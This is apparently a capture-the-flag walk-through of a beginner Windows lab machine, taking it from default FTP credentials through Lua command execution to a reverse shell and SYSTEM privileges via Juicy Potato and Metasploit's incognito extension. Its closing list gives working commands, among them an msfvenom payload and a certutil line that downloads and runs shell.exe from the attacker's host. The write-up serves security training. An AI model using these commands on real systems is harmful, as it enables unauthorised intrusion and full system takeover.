Premise
In this walk-through I enumerate and exploit a vulnerable FTP server to gain remote access to a Windows system, then escalate privileges through token impersonation.
Machine Name: Imposter
Difficulty: Beginner
Skills Learned
- FTP exploitation
- Windows Privilege Escalation
- Token Impersonation with Metasploit
Scanning and Enumeration
I started with an Nmap scan to see what ports were open. The scan showed that the machine was running Windows Server 2008 R2 and had an FTP server on port 8080 with a web interface. I also saw that NetBIOS was enabled, so SMB enumeration was another option to keep in mind.
Exploiting the FTP Server
I was able to log into the FTP server's web interface using the default credentials admin/password. Unchanged default credentials are a common mistake that leaves servers exposed. The web interface had an administration console that allowed me to execute Lua code, and Lua's os.execute("command") runs an arbitrary operating-system command from there.
Getting a Reverse Shell
I explored a few different ways to get a reverse shell:
- Payload Transfer: I created a Windows Meterpreter reverse TCP payload with msfvenom and transferred it to the target machine using certutil. Then I set up a listener and executed the payload. Note that a staged Meterpreter payload needs Metasploit's exploit/multi/handler on the attacker side; a plain Netcat listener only works for a non-Meterpreter payload such as windows/shell_reverse_tcp.
- Netcat Download: Another option was to download Netcat directly to the target machine and use it to create a reverse shell.
- Metasploit Web Delivery: I also used the exploit/multi/script/web_delivery module in Metasploit. This module generates a command that, when run on the target, downloads a payload and creates a session. Since I couldn't copy and paste into the web interface, I had to type the command in manually.
Privilege Escalation
Once I had a shell, I used whoami /priv to check my privileges and saw that SeImpersonatePrivilege was enabled. This privilege lets the process impersonate the security token of any client that authenticates to it, and it is the foundation of the Potato family of exploits and of Metasploit's incognito token stealing; service accounts such as the one running this FTP server commonly hold it.
I tried using Juicy Potato to escalate my privileges by abusing this impersonation privilege. This involved downloading the Juicy Potato tool, transferring it to the target machine, and running it with a specific CLSID and a payload. I made a mistake at first and used the wrong CLSID, but I eventually figured it out. The CLSIDs that work differ between Windows versions, so pick one from the list for the target's build (here Server 2008 R2); Juicy Potato itself only works up to Windows Server 2016 and Windows 10 1803, so it is in scope for this machine.
As an alternative, I used the incognito extension in Metasploit (load incognito from a Meterpreter session). This extension lists the tokens available to the current process and lets me impersonate one of them. I used list_tokens -u to find the NT AUTHORITY\SYSTEM token and then impersonate_token "NT AUTHORITY\SYSTEM" to escalate my privileges.
In the end, I successfully escalated my privileges to NT AUTHORITY\SYSTEM using the incognito extension. It's important to remember that not all methods will work on every machine, so it's good to have a few different options to try.
Technical Commands
Here are some of the commands I used in the video:
- msfvenom: msfvenom -p windows/meterpreter/reverse_tcp lhost=<YOUR_IP> lport=4545 -f exe -o shell.exe
- Lua commands (typed into the admin console):
  os.execute("cmd.exe /c certutil.exe -urlcache -f http://<YOUR_IP>:8000/shell.exe shell.exe")
  os.execute("cmd.exe /c shell.exe")
- Netcat listener: nc -lvp 4545 (for a windows/shell_reverse_tcp payload; the Meterpreter payload above needs exploit/multi/handler with the same LHOST and LPORT instead)
- Juicy Potato: JuicyPotato.exe -l 3344 -t * -p C:\Windows\System32\cmd.exe -c {CLS_ID} (the CLSID must match the target's Windows version; from a remote shell, point -p at a reverse-shell payload, or pass arguments with -a, so the SYSTEM process calls back to you rather than opening a console you cannot see)
- incognito (Metasploit, after load incognito in Meterpreter): list_tokens -u, then impersonate_token "NT AUTHORITY\SYSTEM"